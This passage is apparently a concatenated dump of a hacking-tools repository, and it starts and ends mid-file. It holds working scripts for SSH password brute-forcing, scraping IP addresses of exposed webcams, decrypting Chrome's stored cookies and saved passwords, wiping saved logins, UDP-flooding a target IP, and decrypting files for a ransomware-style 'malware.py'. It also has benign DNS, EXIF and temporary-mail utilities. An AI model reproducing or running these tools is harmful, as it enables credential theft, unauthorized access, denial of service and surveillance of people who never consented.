[-] Invalid input for delay\nDefault set 5') 71 | delay = 5 72 | print('='*30 + 'Banner' +'='*30) 73 | ban_grab(host, port, delay) # Calling function ban_grab() 74 | 75 | if __name__ == '__main__' : 76 | main() 77 | except KeyboardInterrupt: 78 | slowprint(' [-] Exiting....') 79 | -------------------------------------------------------------------------------- /bruteforce_ssh.py: -------------------------------------------------------------------------------- 1 | import paramiko 2 | import socket 3 | import time 4 | from colorama import init, Fore 5 | 6 | # initialize colorama 7 | init() 8 | 9 | GREEN = Fore.GREEN 10 | RED = Fore.RED 11 | RESET = Fore.RESET 12 | BLUE = Fore.BLUE 13 | print('''\033[92m 14 | _ _ _ _ _ _ __ ___ ___ _ _ ___ _ 15 | | || | | | | | | |/ / / __/ __| || | / __|_ _ __ _ __| |_____ _ _ 16 | | __ | |_| | |__| ' < \__ \__ \ __ | | (__| '_/ _` / _| / / -_) '_| 17 | |_||_|\___/|____|_|\_\ |___/___/_||_| \___|_| \__,_\__|_\_\___|_| 18 | 19 | coded by R3DHULK 20 | Github Page : https://github.com/R3DHULK 21 | ''') 22 | 23 | def is_ssh_open(hostname, username, password): 24 | # initialize SSH client 25 | client = paramiko.SSHClient() 26 | # add to know hosts 27 | client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 28 | try: 29 | client.connect(hostname=hostname, username=username, password=password, timeout=3) 30 | except socket.timeout: 31 | # this is when host is unreachable 32 | print(f"{RED} [!] Host: {hostname} is unreachable, timed out.{RESET}") 33 | returning = False 34 | except paramiko.AuthenticationException: 35 | print(f"{RED} [!] Invalid credentials for {username}:{password}") 36 | returning = False 37 | except paramiko.SSHException: 38 | print(f"{BLUE} [*] Quota exceeded, retrying with delay...{RESET}") 39 | # sleep for a minute 40 | time.sleep(60) 41 | returning = is_ssh_open(hostname, username, password) 42 | else: 43 | # connection was established successfully 44 | print(f"{GREEN} [+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}") 45 | returning = True 46 | finally: 47 | client.close() 48 | return returning 49 | 50 | 51 | if __name__ == "__main__": 52 | import argparse 53 | parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.") 54 | parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.") 55 | parser.add_argument("-P", "--passlist", help="File that contain password list in each line.") 56 | parser.add_argument("-u", "--user", help="Host username.") 57 | 58 | # parse passed arguments 59 | args = parser.parse_args() 60 | host = args.host 61 | passlist = args.passlist 62 | user = args.user 63 | # read the file 64 | passlist = open(passlist).read().splitlines() 65 | # brute-force 66 | for password in passlist: 67 | if is_ssh_open(host, user, password): 68 | # if combo is valid, save it to a file 69 | open("credentials.txt", "w").write(f"{user}@{host}:{password}") 70 | break 71 | -------------------------------------------------------------------------------- /cam-hackers.py: -------------------------------------------------------------------------------- 1 | 2 | #!/usr/bin/env python3 3 | #-*- coding: utf-8 -*- 4 | #github.com/AngelSecurityTeam/Cam-Hackers 5 | 6 | import requests, re , colorama ,random 7 | from requests.structures import CaseInsensitiveDict 8 | colorama.init() 9 | 10 | url = "http://www.insecam.org/en/jsoncountries/" 11 | 12 | headers = CaseInsensitiveDict() 13 | headers["Accept"] = "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" 14 | headers["Cache-Control"] = "max-age=0" 15 | headers["Connection"] = "keep-alive" 16 | headers["Host"] = "www.insecam.org" 17 | headers["Upgrade-Insecure-Requests"] = "1" 18 | headers["User-Agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36" 19 | 20 | 21 | resp = requests.get(url, headers=headers) 22 | 23 | data = resp.json() 24 | countries = data['countries'] 25 | 26 | print(""" 27 | \033[1;31m\033[1;37m ██████╗ █████╗ ███╗ ███╗ ██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ 28 | ██╔════╝██╔══██╗████╗ ████║ ██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ 29 | ██║ ███████║██╔████╔██║█████╗███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗ 30 | ██║ ██╔══██║██║╚██╔╝██║╚════╝██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║ 31 | ╚██████╗██║ ██║██║ ╚═╝ ██║ ██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ 32 | \033[1;31m ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ 33 | \033[1;31m ANGELSECURITYTEAM \033[1;31m\033[1;37m""") 34 | 35 | for key, value in countries.items(): 36 | print(f'Code : ({key}) - {value["country"]} / ({value["count"]}) ') 37 | print("") 38 | 39 | 40 | 41 | try: 42 | 43 | 44 | country = input("Code(##) : ") 45 | res = requests.get( 46 | f"http://www.insecam.org/en/bycountry/{country}", headers=headers 47 | ) 48 | last_page = re.findall(r'pagenavigator\("\?page=", (\d+)', res.text)[0] 49 | 50 | for page in range(int(last_page)): 51 | res = requests.get( 52 | f"http://www.insecam.org/en/bycountry/{country}/?page={page}", 53 | headers=headers 54 | ) 55 | find_ip = re.findall(r"http://\d+.\d+.\d+.\d+:\d+", res.text) 56 | 57 | with open(f'{country}.txt', 'w') as f: 58 | for ip in find_ip: 59 | print("") 60 | print("\033[1;31m", ip) 61 | f.write(f'{ip}\n') 62 | except: 63 | pass 64 | finally: 65 | print("\033[1;37m") 66 | print('\033[37mSave File :'+country+'.txt') 67 | 68 | exit() 69 | 70 | -------------------------------------------------------------------------------- /chrome-cookie_extractor.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | import base64 4 | import sqlite3 5 | import shutil 6 | from datetime import datetime, timedelta 7 | import win32crypt # pip install pypiwin32 8 | from Crypto.Cipher import AES # pip install pycryptodome 9 | 10 | print(''' 11 | ******************************************************************************************* 12 | * ___ _ * 13 | * / __| |_ _ _ ___ _ __ ___ * 14 | * | (__| ' \| '_/ _ \ ' \/ -_) * 15 | * \___|_||_|_| \___/_|_|_\___| * 16 | * ___ _ _ * 17 | * / __|___ ___| |__ (_)___ * 18 | * | (__/ _ \/ _ \ / / | / -_) * 19 | * \___\___/\___/_\_\ |_\___| * 20 | * This Tool ___ _ _ * 21 | * Only Works | __|_ _| |_ _ _ __ _ __| |_ ___ _ _ * 22 | * If You have installed | _|\ \ / _| '_/ _` / _| _/ _ \ '_| * 23 | * "Google-Chrome Browser" |___/_\_\\__|_| \__,_\__|\__\___/_| * 24 | * * 25 | * coded by R3dHULK * 26 | * github download link : https://github.com/R3DHULK/chrome-cookie-extractor.git * 27 | * * 28 | ******************************************************************************************* 29 | ''') 30 | 31 | print (''' 32 | [!] HULK is gathering the cookies of your chrome ... 33 | 34 | I Hope You search your private data in incognito mode 35 | [*] Results ... 36 | ''') 37 | def get_chrome_datetime(chromedate): 38 | if chromedate != 86400000000 and chromedate: 39 | try: 40 | return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) 41 | except Exception as e: 42 | print(f"Error: {e}, chromedate: {chromedate}") 43 | return chromedate 44 | else: 45 | return "" 46 | 47 | 48 | def get_encryption_key(): 49 | local_state_path = os.path.join(os.environ["USERPROFILE"], 50 | "AppData", "Local", "Google", "Chrome", 51 | "User Data", "Local State") 52 | with open(local_state_path, "r", encoding="utf-8") as f: 53 | local_state = f.read() 54 | local_state = json.loads(local_state) 55 | 56 | # decode the encryption key from Base64 57 | key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 58 | # remove 'DPAPI' str 59 | key = key[5:] 60 | # return decrypted key that was originally encrypted 61 | # using a session key derived from current user's logon credentials 62 | # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html 63 | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 64 | 65 | 66 | def decrypt_data(data, key): 67 | try: 68 | # get the initialization vector 69 | iv = data[3:15] 70 | data = data[15:] 71 | # generate cipher 72 | cipher = AES.new(key, AES.MODE_GCM, iv) 73 | # decrypt password 74 | return cipher.decrypt(data)[:-16].decode() 75 | except: 76 | try: 77 | return str(win32crypt.CryptUnprotectData(data, None, None, None, 0)[1]) 78 | except: 79 | # not supported 80 | return "" 81 | 82 | 83 | def main(): 84 | # local sqlite Chrome cookie database path 85 | db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", 86 | "Google", "Chrome", "User Data", "Default", "Network", "Cookies") 87 | # copy the file to current directory 88 | # as the database will be locked if chrome is currently open 89 | filename = "Cookies.db" 90 | if not os.path.isfile(filename): 91 | # copy file when does not exist in the current directory 92 | shutil.copyfile(db_path, filename) 93 | # connect to the database 94 | db = sqlite3.connect(filename) 95 | # ignore decoding errors 96 | db.text_factory = lambda b: b.decode(errors="ignore") 97 | cursor = db.cursor() 98 | # get the cookies from `cookies` table 99 | cursor.execute(""" 100 | SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 101 | FROM cookies""") 102 | # you can also search by domain, e.g thepythoncode.com 103 | # cursor.execute(""" 104 | # SELECT host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value 105 | # FROM cookies 106 | # WHERE host_key like '%thepythoncode.com%'""") 107 | # get the AES key 108 | key = get_encryption_key() 109 | for host_key, name, value, creation_utc, last_access_utc, expires_utc, encrypted_value in cursor.fetchall(): 110 | if not value: 111 | decrypted_value = decrypt_data(encrypted_value, key) 112 | else: 113 | # already decrypted 114 | decrypted_value = value 115 | print(f""" 116 | Host: {host_key} 117 | Cookie name: {name} 118 | Cookie value (decrypted): {decrypted_value} 119 | Creation datetime (UTC): {get_chrome_datetime(creation_utc)} 120 | Last access datetime (UTC): {get_chrome_datetime(last_access_utc)} 121 | Expires datetime (UTC): {get_chrome_datetime(expires_utc)} 122 | ===============================================================""") 123 | # update the cookies table with the decrypted value 124 | # and make session cookie persistent 125 | cursor.execute(""" 126 | UPDATE cookies SET value = ?, has_expires = 1, expires_utc = 99999999999999999, is_persistent = 1, is_secure = 0 127 | WHERE host_key = ? 128 | AND name = ?""", (decrypted_value, host_key, name)) 129 | # commit changes 130 | db.commit() 131 | # close connection 132 | db.close() 133 | 134 | 135 | if __name__ == "__main__": 136 | main() -------------------------------------------------------------------------------- /chrome-pass-remover.py: -------------------------------------------------------------------------------- 1 | import sqlite3 2 | import os 3 | 4 | db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", 5 | "Google", "Chrome", "User Data", "default", "Login Data") 6 | 7 | db = sqlite3.connect(db_path) 8 | cursor = db.cursor() 9 | # `logins` table has the data we need 10 | cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") 11 | n_logins = len(cursor.fetchall()) 12 | print(f"Deleting a total of {n_logins} logins...") 13 | cursor.execute("delete from logins") 14 | cursor.connection.commit() -------------------------------------------------------------------------------- /chrome-pass-stealer.py: -------------------------------------------------------------------------------- 1 | import os 2 | import json 3 | import base64 4 | import sqlite3 5 | import win32crypt 6 | from Crypto.Cipher import AES 7 | import shutil 8 | from datetime import timezone, datetime, timedelta 9 | 10 | def get_chrome_datetime(chromedate): 11 | return datetime(1601, 1, 1) + timedelta(microseconds=chromedate) 12 | 13 | def get_encryption_key(): 14 | local_state_path = os.path.join(os.environ["USERPROFILE"], 15 | "AppData", "Local", "Google", "Chrome", 16 | "User Data", "Local State") 17 | with open(local_state_path, "r", encoding="utf-8") as f: 18 | local_state = f.read() 19 | local_state = json.loads(local_state) 20 | 21 | # decode the encryption key from Base64 22 | key = base64.b64decode(local_state["os_crypt"]["encrypted_key"]) 23 | # remove DPAPI str 24 | key = key[5:] 25 | # return decrypted key that was originally encrypted 26 | # using a session key derived from current user's logon credentials 27 | # doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html 28 | return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1] 29 | 30 | 31 | def decrypt_password(password, key): 32 | try: 33 | # get the initialization vector 34 | iv = password[3:15] 35 | password = password[15:] 36 | # generate cipher 37 | cipher = AES.new(key, AES.MODE_GCM, iv) 38 | # decrypt password 39 | return cipher.decrypt(password)[:-16].decode() 40 | except: 41 | try: 42 | return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1]) 43 | except: 44 | # not supported 45 | return "" 46 | 47 | 48 | def main(): 49 | # get the AES key 50 | key = get_encryption_key() 51 | # local sqlite Chrome database path 52 | db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local", 53 | "Google", "Chrome", "User Data", "default", "Login Data") 54 | # copy the file to another location 55 | # as the database will be locked if chrome is currently running 56 | filename = "ChromeData.db" 57 | shutil.copyfile(db_path, filename) 58 | # connect to the database 59 | db = sqlite3.connect(filename) 60 | cursor = db.cursor() 61 | # `logins` table has the data we need 62 | cursor.execute("select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created") 63 | # iterate over all rows 64 | for row in cursor.fetchall(): 65 | origin_url = row[0] 66 | action_url = row[1] 67 | username = row[2] 68 | password = decrypt_password(row[3], key) 69 | date_created = row[4] 70 | date_last_used = row[5] 71 | if username or password: 72 | print(f"Origin URL: {origin_url}") 73 | print(f"Action URL: {action_url}") 74 | print(f"Username: {username}") 75 | print(f"Password: {password}") 76 | else: 77 | continue 78 | if date_created != 86400000000 and date_created: 79 | print(f"Creation date: {str(get_chrome_datetime(date_created))}") 80 | if date_last_used != 86400000000 and date_last_used: 81 | print(f"Last Used: {str(get_chrome_datetime(date_last_used))}") 82 | print("="*50) 83 | 84 | cursor.close() 85 | db.close() 86 | try: 87 | # try to remove the copied db file 88 | os.remove(filename) 89 | except: 90 | pass 91 | 92 | 93 | if __name__ == "__main__": 94 | main() 95 | input("Enter To Exit Window") -------------------------------------------------------------------------------- /click-jacking-vul-scan.py: -------------------------------------------------------------------------------- 1 | from urllib.request import urlopen 2 | from sys import argv, exit 3 | 4 | __author__ = 'AppSec Jay' 5 | 6 | def check(url): 7 | ''' Verify given URL is vulnerable or not ''' 8 | 9 | try: 10 | if "http" not in url: url = "https://" + url 11 | 12 | data = urlopen(url) 13 | headers = data.info() 14 | 15 | if not ("X-Frame-Options" or "frame-ancestors") in headers: return True 16 | 17 | except: return False 18 | 19 | 20 | def create_poc(url): 21 | ''' Create HTML page of given vulnerable URL ''' 22 | 23 | code = """ 24 | 25 | Clickjack Test Page 26 | 27 |

Website is Vulnerable to Clickjacking!

28 | 29 | 30 | 31 | """.format(url) 32 | 33 | with open(url + ".html", "w") as f: 34 | f.write(code) 35 | f.close() 36 | 37 | 38 | def main(): 39 | ''' Everything comes together ''' 40 | 41 | try: sites = open(argv[1], 'r').readlines() 42 | except: print("[*] Usage: python3 clickjacking_scanner.py "); exit(0) 43 | 44 | for site in sites[0:]: 45 | print("\n[*] Checking " + site) 46 | status = check(site) 47 | 48 | if status: 49 | print(" [+] Website is Vulnerable!") 50 | create_poc(site.split('\n')[0]) 51 | print(" [*] Created a POC and saved to .html") 52 | 53 | elif not status: print(" [-] Website is not vulnerable!") 54 | else: print('Every single thing is crashed, Python got mad, dude wtf you just did?') 55 | 56 | if __name__ == '__main__': main() 57 | -------------------------------------------------------------------------------- /ddos.py: -------------------------------------------------------------------------------- 1 | #Lets import modules 2 | import sys 3 | import os 4 | import time 5 | import socket 6 | import scapy.all as scapy 7 | import random 8 | import threading 9 | 10 | #Lets start coding 11 | from datetime import datetime 12 | now = datetime.now() 13 | hour = now.hour 14 | minute = now.minute 15 | day = now.day 16 | month = now.month 17 | year = now.year 18 | 19 | #Lets define sock and bytes 20 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 21 | bytes = random._urandom(1490) 22 | os.system("clear") 23 | #Banner : 24 | print(''' 25 | ************************************************ 26 | * _ _ _ _ _ _ __ * 27 | * | || | | | | | | |/ / * 28 | * | __ | |_| | |__| ' < * 29 | * |_||_|\___/|____|_|\_\ * 30 | * * 31 | * HTTP Unbearable Load King * 32 | * Author: Sumalya Chatterjee * 33 | * * 34 | ************************************************ 35 | ************************************************ 36 | * * 37 | * [!] Disclaimer : * 38 | * 1. Don't Use For Personal Revenges * 39 | * 2. Author Is Not Responsible For Your Jobs * 40 | * 3. Use for learning purposes * 41 | * 4. Does HULK suit in villain role, huh? * 42 | ************************************************ 43 | ''') 44 | #Type your ip and port number (find IP address using nslookup or any online website) 45 | ip = input(" [+] Give HULK A Target IP : ") 46 | port = eval(input(" [+] Starting Port NO : ")) 47 | 48 | #Lets start our attack 49 | print(" ") 50 | print(" That's my secret Cap, I am always angry ") 51 | print(" " ) 52 | print(" [+] HULK is attacking server " + ip ) 53 | print (" " ) 54 | time.sleep(5) 55 | sent = 0 56 | try : 57 | while True: 58 | sock.sendto(bytes, (ip, port)) 59 | sent = sent + 1 60 | port = port + 1 61 | print("Sent %s packet to %s throught port:%s"%(sent,ip,port)) 62 | if port == 65534: 63 | port = 1 64 | except KeyboardInterrupt: 65 | print(" ") 66 | print("\n [-] Ctrl+C Detected.........Exiting") 67 | print(" [-] DDOS ATTACKING STOPPED") 68 | input("Enter To Exit") -------------------------------------------------------------------------------- /decrypt.py: -------------------------------------------------------------------------------- 1 | #1/usr/bin/env python3 2 | 3 | import os 4 | from cryptography.fernet import Fernet 5 | 6 | # find out files for encrypted 7 | 8 | files = [] 9 | for file in os.listdir(): 10 | if file == "malware.py" or file == "thekey.key" or file == "decrypt.py": 11 | continue 12 | if os.path.isfile(file): 13 | files.append(file) 14 | print(files) 15 | 16 | with open("thekey.key" , "rb") as key: 17 | secretkey = key.read() 18 | 19 | secretphrase = "r3dhulk" 20 | user_phrase = input("Enter The Key for Decryption : ") 21 | 22 | if user_phrase == secretphrase : 23 | for file in files: 24 | with open(file, "rb") as thefile: 25 | contents = thefile.read() 26 | contents_decrypted = Fernet(secretkey).decrypt(contents) 27 | with open(file, "wb") as thefile: 28 | thefile.write(contents_decrypted) 29 | print("Your Files Are Decrypted. Never mess up with malware in future " ) 30 | else : 31 | print("Sorry, wrong secretphrase") 32 | -------------------------------------------------------------------------------- /dns-enumeration.py: -------------------------------------------------------------------------------- 1 | import dns.resolver 2 | 3 | # Set the target domain and record type 4 | print ('''\033[93m 5 | ********************************************** 6 | * Simple DNS Enumeration Tool * 7 | * github page : https://github.com/r3dhulk * 8 | ********************************************** 9 | ''') 10 | target_domain = input("\033[92m [*] Hulk Wants The URL: ") 11 | record_types = ["A", "AAAA", "CNAME", "MX", "NS", "SOA", "TXT"] 12 | # Create a DNS resolver 13 | resolver = dns.resolver.Resolver() 14 | for record_type in record_types: 15 | # Perform DNS lookup for the specified domain and record type 16 | try: 17 | answers = resolver.resolve(target_domain, record_type) 18 | except dns.resolver.NoAnswer: 19 | continue 20 | # Print the answers 21 | print(f"{record_type} records for {target_domain}:") 22 | for rdata in answers: 23 | print(f" {rdata}") 24 | -------------------------------------------------------------------------------- /exif-remover.py: -------------------------------------------------------------------------------- 1 | print(''' 2 | [?]Disclaimer: This script is for educational purposes only. 3 | [!] Do not use against any photos that you don't own or have authorization to test. 4 | 5 | [?] Additional talks : 6 | [!] This program is for .JPG and .TIFF format files. 7 | [!] Installation and usage instructions: 8 | [!] Install Pillow (Pillow will not work if you have PIL installed): 9 | [!] python3 -m pip install --upgrade pip 10 | [!] python3 -m pip install --upgrade Pillow 11 | [!] Note most social media sites strip exif data from uploaded photos. 12 | ''') 13 | 14 | # Print Logo 15 | print(""" 16 | ************************************************************************** 17 | * ___ _ __ ___ * 18 | * | __|_ _(_)/ _| | _ \___ _ __ _____ _____ _ _ * 19 | * | _|\ \ / | _| | / -_) ' \/ _ \ V / -_) '_| * 20 | * |___/_\_\_|_| |_|_\___|_|_|_\___/\_/\___|_| * 21 | * * 22 | * The Software'll not show anything, but you're gonna see the real magic * 23 | * * 24 | ************************************************************************** 25 | """) 26 | 27 | 28 | import os 29 | from PIL import Image 30 | 31 | # Add files to the folder ./images 32 | # We assign the cwd to a variable. We will refer to it to get the path to images. 33 | cwd = os.getcwd() 34 | # Change the current working directory to the one where you keep your images. 35 | os.chdir(os.path.join(cwd, "images")) 36 | # Get a list of all the files in the images directory. 37 | files = os.listdir() 38 | 39 | # Check if you have any files in the ./images folder. 40 | if len(files) == 0: 41 | print("You don't have have files in the ./images folder.") 42 | exit() 43 | # Loop through the files in the images directory. 44 | for file in files: 45 | # We add try except black to handle when there are wrong file formats in the ./images folder. 46 | try: 47 | img = Image.open(file) 48 | # We get the exif data from the which we'll overwrite 49 | img_data = list(img.getdata()) 50 | # We create a new Image object. We initialise it with the same mode and size as the original image. 51 | img_no_exif = Image.new(img.mode, img.size) 52 | # We copy the pixel data from img_data. 53 | img_no_exif.putdata(img_data) 54 | # We save the new image without exif data. The keyword argument exif would've been used with the exif data if you wanted to save any. We overwrite the original image. 55 | img_no_exif.save(file) 56 | except IOError: 57 | print("File format not supported!") 58 | input("Enter To Close The Window") -------------------------------------------------------------------------------- /exif.py: -------------------------------------------------------------------------------- 1 | print('''[?] Disclaimer: This script is for educational purposes only. 2 | [!] Do not use against any photos that you don't own or have authorization to test. 3 | 4 | [?] Please note: 5 | [!] You have to keep your files in ~/image directory. 6 | [!] This program is for .JPG and .TIFF format files. The program could be extended to support .HEIC, .PNG and other formats. 7 | [!] Installation and usage instructions: 8 | [!] Install Pillow (Pillow will not work if you have PIL installed): 9 | [!] python3 -m pip install --upgrade pip. 10 | [!] python3 -m pip install --upgrade Pillow. 11 | ''') 12 | import os 13 | import sys 14 | from PIL import Image 15 | from PIL.ExifTags import GPSTAGS, TAGS 16 | 17 | 18 | # Helper function 19 | def create_google_maps_url(gps_coords): 20 | # Exif data stores coordinates in degree/minutes/seconds format. To convert to decimal degrees. 21 | # We extract the data from the dictionary we sent to this function for latitudinal data. 22 | dec_deg_lat = convert_decimal_degrees(float(gps_coords["lat"][0]), float(gps_coords["lat"][1]), float(gps_coords["lat"][2]), gps_coords["lat_ref"]) 23 | # We extract the data from the dictionary we sent to this function for longitudinal data. 24 | dec_deg_lon = convert_decimal_degrees(float(gps_coords["lon"][0]), float(gps_coords["lon"][1]), float(gps_coords["lon"][2]), gps_coords["lon_ref"]) 25 | # We return a search string which can be used in Google Maps 26 | return f"https://maps.google.com/?q={dec_deg_lat},{dec_deg_lon}" 27 | 28 | 29 | # Converting to decimal degrees for latitude and longitude is from degree/minutes/seconds format is the same for latitude and longitude. So we use DRY principles, and create a seperate function. 30 | def convert_decimal_degrees(degree, minutes, seconds, direction): 31 | decimal_degrees = degree + minutes / 60 + seconds / 3600 32 | # A value of "S" for South or West will be multiplied by -1 33 | if direction == "S" or direction == "W": 34 | decimal_degrees *= -1 35 | return decimal_degrees 36 | 37 | 38 | # Print Logo 39 | print(""" 40 | *************************************** 41 | * ___ _ __ _____ _ * 42 | * | __|_ _(_)/ _| |_ _|__ ___| | * 43 | * | _|\ \ / | _| | |/ _ \/ _ \ | * 44 | * |___/_\_\_|_| |_|\___/\___/_| * 45 | * * 46 | *************************************** 47 | """) 48 | 49 | # Add files to the folder ./images 50 | # We assign the cwd to a variable. We will refer to it to get the path to images. 51 | cwd = os.getcwd() 52 | # Change the current working directory to the one where you keep your images. 53 | os.chdir(os.path.join(cwd, "images")) 54 | # Get a list of all the files in the images directory. 55 | files = os.listdir() 56 | 57 | # Check if you have any files in the ./images folder. 58 | if len(files) == 0: 59 | print("You don't have have files in the ./images folder.") 60 | exit() 61 | # Loop through the files in the images directory. 62 | for file in files: 63 | # We add try except black to handle when there are wrong file formats in the ./images folder. 64 | try: 65 | # Open the image file. We open the file in binary format for reading. 66 | image = Image.open(file) 67 | print(f"_______________________________________________________________{file}_______________________________________________________________") 68 | # The ._getexif() method returns a dictionary. .items() method returns a list of all dictionary keys and values. 69 | gps_coords = {} 70 | # We check if exif data are defined for the image. 71 | if image._getexif() == None: 72 | print(f"{file} contains no exif data.") 73 | # If exif data are defined we can cycle through the tag, and value for the file. 74 | else: 75 | for tag, value in image._getexif().items(): 76 | # If you print the tag without running it through the TAGS.get() method you'll get numerical values for every tag. We want the tags in human-readable form. 77 | # You can see the tags and the associated decimal number in the exif standard here: https://exiv2.org/tags.html 78 | tag_name = TAGS.get(tag) 79 | if tag_name == "GPSInfo": 80 | for key, val in value.items(): 81 | # Print the GPS Data value for every key to the screen. 82 | print(f"{GPSTAGS.get(key)} - {val}") 83 | # We add Latitude data to the gps_coord dictionary which we initialized in line 110. 84 | if GPSTAGS.get(key) == "GPSLatitude": 85 | gps_coords["lat"] = val 86 | # We add Longitude data to the gps_coord dictionary which we initialized in line 110. 87 | elif GPSTAGS.get(key) == "GPSLongitude": 88 | gps_coords["lon"] = val 89 | # We add Latitude reference data to the gps_coord dictionary which we initialized in line 110. 90 | elif GPSTAGS.get(key) == "GPSLatitudeRef": 91 | gps_coords["lat_ref"] = val 92 | # We add Longitude reference data to the gps_coord dictionary which we initialized in line 110. 93 | elif GPSTAGS.get(key) == "GPSLongitudeRef": 94 | gps_coords["lon_ref"] = val 95 | else: 96 | # We print data not related to the GPSInfo. 97 | print(f"{tag_name} - {value}") 98 | # We print the longitudinal and latitudinal data which has been formatted for Google Maps. We only do so if the GPS Coordinates exists. 99 | if gps_coords: 100 | print(create_google_maps_url(gps_coords)) 101 | # Change back to the original working directory. 102 | except IOError: 103 | print("File format not supported!") 104 | os.chdir(cwd) 105 | input('Enter To Exit') -------------------------------------------------------------------------------- /fakemail.py: -------------------------------------------------------------------------------- 1 | import pyperclip 2 | import requests 3 | import random 4 | import string 5 | import time 6 | import sys 7 | import re 8 | import os 9 | 10 | API = 'https://www.1secmail.com/api/v1/' 11 | domainList = ['1secmail.com', '1secmail.net', '1secmail.org'] 12 | domain = random.choice(domainList) 13 | 14 | def banner(): 15 | print(r''' 16 | ▄████ ██ █ █▀ ▄███▄ █▀▄▀█ ██ ▄█ █ 17 | █▀ ▀ █ █ █▄█ █▀ ▀ █ █ █ █ █ ██ █ 18 | █▀▀ █▄▄█ █▀▄ ██▄▄ █ ▄ █ █▄▄█ ██ █ 19 | █ █ █ █ █ █▄ ▄▀ █ █ █ █ ▐█ ███▄ 20 | █ █ █ ▀███▀ █ █ ▐ ▀ 21 | ▀ █ ▀ ▀ █ 22 | ▀ ▀ 23 | domainList = ['1secmail.com','1secmail.net','1secmail.org'] 24 | ''') 25 | 26 | def generateUserName(): 27 | name = string.ascii_lowercase + string.digits 28 | username = ''.join(random.choice(name) for i in range(10)) 29 | return username 30 | 31 | def extract(): 32 | getUserName = re.search(r'login=(.*)&',newMail).group(1) 33 | getDomain = re.search(r'domain=(.*)', newMail).group(1) 34 | return [getUserName, getDomain] 35 | 36 | # Got this from https://stackoverflow.com/a/43952192/13276219 37 | def print_statusline(msg: str): 38 | last_msg_length = len(print_statusline.last_msg) if hasattr(print_statusline, 'last_msg') else 0 39 | print(' ' * last_msg_length, end='\r') 40 | print(msg, end='\r') 41 | sys.stdout.flush() 42 | print_statusline.last_msg = msg 43 | 44 | def deleteMail(): 45 | url = 'https://www.1secmail.com/mailbox' 46 | data = { 47 | 'action': 'deleteMailbox', 48 | 'login': f'{extract()[0]}', 49 | 'domain': f'{extract()[1]}' 50 | } 51 | 52 | print_statusline("Disposing your email address - " + mail + '\n') 53 | req = requests.post(url, data=data) 54 | 55 | def checkMails(): 56 | reqLink = f'{API}?action=getMessages&login={extract()[0]}&domain={extract()[1]}' 57 | req = requests.get(reqLink).json() 58 | length = len(req) 59 | if length == 0: 60 | print_statusline("Your mailbox is empty. Hold tight. Mailbox is refreshed automatically every 5 seconds.") 61 | else: 62 | idList = [] 63 | for i in req: 64 | for k,v in i.items(): 65 | if k == 'id': 66 | mailId = v 67 | idList.append(mailId) 68 | 69 | x = 'mails' if length > 1 else 'mail' 70 | print_statusline(f"You received {length} {x}. (Mailbox is refreshed automatically every 5 seconds.)") 71 | 72 | current_directory = os.getcwd() 73 | final_directory = os.path.join(current_directory, r'All Mails') 74 | if not os.path.exists(final_directory): 75 | os.makedirs(final_directory) 76 | 77 | for i in idList: 78 | msgRead = f'{API}?action=readMessage&login={extract()[0]}&domain={extract()[1]}&id={i}' 79 | req = requests.get(msgRead).json() 80 | for k,v in req.items(): 81 | if k == 'from': 82 | sender = v 83 | if k == 'subject': 84 | subject = v 85 | if k == 'date': 86 | date = v 87 | if k == 'textBody': 88 | content = v 89 | 90 | mail_file_path = os.path.join(final_directory, f'{i}.txt') 91 | 92 | with open(mail_file_path,'w') as file: 93 | file.write("Sender: " + sender + '\n' + "To: " + mail + '\n' + "Subject: " + subject + '\n' + "Date: " + date + '\n' + "Content: " + content + '\n') 94 | 95 | banner() 96 | userInput1 = input("Do you wish to use to a custom domain name (Y/N): ").capitalize() 97 | 98 | try: 99 | 100 | if userInput1 == 'Y' or userInput1 == 'y' : 101 | userInput2 = input("\nEnter the name that you wish to use as your domain name: ") 102 | newMail = f"{API}?login={userInput2}&domain={domain}" 103 | reqMail = requests.get(newMail) 104 | mail = f"{extract()[0]}@{extract()[1]}" 105 | pyperclip.copy(mail) 106 | print("\nYour temporary email is " + mail + " (Email address copied to clipboard.)" +"\n") 107 | print(f"---------------------------- | Inbox of {mail}| ----------------------------\n") 108 | while True: 109 | checkMails() 110 | time.sleep(5) 111 | 112 | if userInput1 == 'N' or userInput1 == 'n': 113 | newMail = f"{API}?login={generateUserName()}&domain={domain}" 114 | reqMail = requests.get(newMail) 115 | mail = f"{extract()[0]}@{extract()[1]}" 116 | pyperclip.copy(mail) 117 | print("\nYour temporary email is " + mail + " (Email address copied to clipboard.)" + "\n") 118 | print(f"---------------------------- | Inbox of {mail} | 